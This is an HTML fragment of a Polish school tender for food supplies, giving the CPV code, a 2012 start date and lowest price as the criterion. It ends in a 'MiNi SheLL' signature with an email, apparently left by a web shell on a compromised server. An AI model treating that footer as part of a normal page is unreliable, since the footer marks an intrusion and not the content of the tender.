Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com